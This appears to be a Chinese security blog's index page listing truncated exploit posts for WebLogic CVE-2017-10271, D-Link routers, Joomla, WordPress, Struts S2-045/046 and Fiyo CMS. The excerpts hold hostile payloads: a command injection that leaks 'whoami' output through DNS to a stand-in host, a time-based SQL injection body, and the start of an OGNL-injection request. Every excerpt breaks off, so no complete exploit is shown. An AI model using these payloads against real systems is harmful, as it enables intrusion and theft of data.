• Weblogic(CVE-2017-10271)漏洞Exp

    Weblogic(CVE-2017-10271)漏洞Exp
    文章作者:莫须有 命令格式:python3 CVE-2017-10271.py url command eg:python3 CVE-2017-10271.py http://test.cve “ping \`whoami\`.dnslog.cve # -*- coding: UTF-8 -*- ''' Created on 2017年12月23日 @author: 莫须有 CVE-2017-10271 EXP ''' import requests,sys headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 ...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:626次 | 标签:,
  • D-Link DIR8xx 远程代码执行漏洞

    D-Link DIR8xx 远程代码执行漏洞
    脚本下载: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01 SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07 def _str(address): return stru...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:1,068次 | 标签:
  • Joomla Photo Contest 1.0.2 SQL Injection Vulnerability

    Joomla Photo Contest 1.0.2 SQL Injection Vulnerability
    # # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinu...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:955次 | 标签:
  • WordPress Huge-IT Video Gallery 2.0.4 SQL注入

    WordPress Huge-IT Video Gallery 2.0.4 SQL注入
    Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC) Fi...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:2,086次 | 标签:
  • S2-046 PoC

    S2-046 PoC
    POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ------WebKitFormBoundaryAnmUgTEhFhOZpr9z Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletRe...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:2,572次 | 标签:
  • Fiyo CMS 2.0.6.1 权限提升漏洞

    Fiyo CMS 2.0.6.1 权限提升漏洞
    # Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksya, @dvnrcy # Vendor Homepage: http://www.fiyo.org # Software Link: https://sourceforge.net/projects/fiyo-cms # Version: 2.0.6.1 # Tested on: Windows Server 2012 Datacenter Evaluation ...阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:2,135次 | 标签:
  • st2-045测试工具

    st2-045测试工具
    相信有不少运维朋友又要加班加点的打补丁了。 本工具仅用作探测自有资产是否存在该漏洞,请勿用于其他用途,否则后果自负。 测试工具: st2-045ihonker专版 修复意见: 升级st2框架 阅读全文
    作者:unhonker | 分类:漏洞公布 | 被撸:4,305次 | 标签: